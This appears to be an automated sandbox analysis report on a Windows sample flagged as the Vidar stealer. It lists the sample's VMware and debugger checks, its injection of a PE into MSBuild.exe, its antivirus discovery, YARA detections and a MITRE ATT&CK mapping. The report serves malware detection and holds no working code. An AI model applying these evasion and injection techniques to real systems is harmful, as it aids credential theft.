Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00410FBA GetSystemInfo,

3_2_00410FBA

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000003.00000002.1981603687.0000000001168000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWW
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000003.00000002.1981603687.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node			graph_3-21797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node			graph_3-21813

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\lCVFGKfczi.exe

Code function: 0_2_00DC7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00DC7922

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

3_2_0042594E

Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DC2003 mov edi, dword ptr fs:[00000030h]	0_2_00DC2003
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DEE385 mov eax, dword ptr fs:[00000030h]	0_2_00DEE385
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DEE37A mov eax, dword ptr fs:[00000030h]	0_2_00DEE37A
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DEE362 mov eax, dword ptr fs:[00000030h]	0_2_00DEE362
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E05582 mov eax, dword ptr fs:[00000030h]	0_2_00E05582
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DDA64C mov eax, dword ptr fs:[00000030h]	0_2_00DDA64C
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DD0F2E mov ecx, dword ptr fs:[00000030h]	0_2_00DD0F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004186AA mov eax, dword ptr fs:[00000030h]	3_2_004186AA

Source: C:\Users\user\Desktop\lCVFGKfczi.exe

Code function: 0_2_00DDCC4B GetProcessHeap,

0_2_00DDCC4B

Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DC7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00DC7610
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DC7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00DC7922
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DC7AAF SetUnhandledExceptionFilter,	0_2_00DC7AAF
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DCDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00DCDA73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041D12A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041D12A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041DAAC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042774E SetUnhandledExceptionFilter,	3_2_0042774E

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\lCVFGKfczi.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_0040F54A _memset,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,

3_2_0040F54A

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\lCVFGKfczi.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DB4008	Jump to behavior

Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\lCVFGKfczi.exe

Code function: 0_2_00DEE076 cpuid

0_2_00DEE076

Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00DDC085
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: GetLocaleInfoW,	0_2_00DD622B
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,	0_2_00E123DB
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: EnumSystemLocalesW,	0_2_00DDC372
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: EnumSystemLocalesW,	0_2_00DDC327
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00DDC498
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: EnumSystemLocalesW,	0_2_00DDC40D
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00E1456E
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: GetLocaleInfoW,	0_2_00DDC6EB
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00DDC814
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00DDC9E9
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: GetLocaleInfoW,	0_2_00DDC91A
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	0_2_00E16A48
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_00E17B38
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00E15DBC
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	0_2_00E16D66
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: EnumSystemLocalesW,	0_2_00DD5D7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0042B1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0042B2E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_0042B3E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_0042B388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0042AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_00425503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0042B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_004275BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesA,	3_2_0042B676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00428EE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429E8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_0042E68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00427696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0042B743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B707
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	3_2_0042E7C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\lCVFGKfczi.exe

Code function: 0_2_00DC7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00DC7815

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00410D2E GetTimeZoneInformation,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000003.00000002.1981603687.0000000001168000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lCVFGKfczi.exe.dedad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lCVFGKfczi.exe.dedad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lCVFGKfczi.exe.dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lCVFGKfczi.exe.dedad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lCVFGKfczi.exe.dedad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lCVFGKfczi.exe.dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	161 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	411 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	44 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

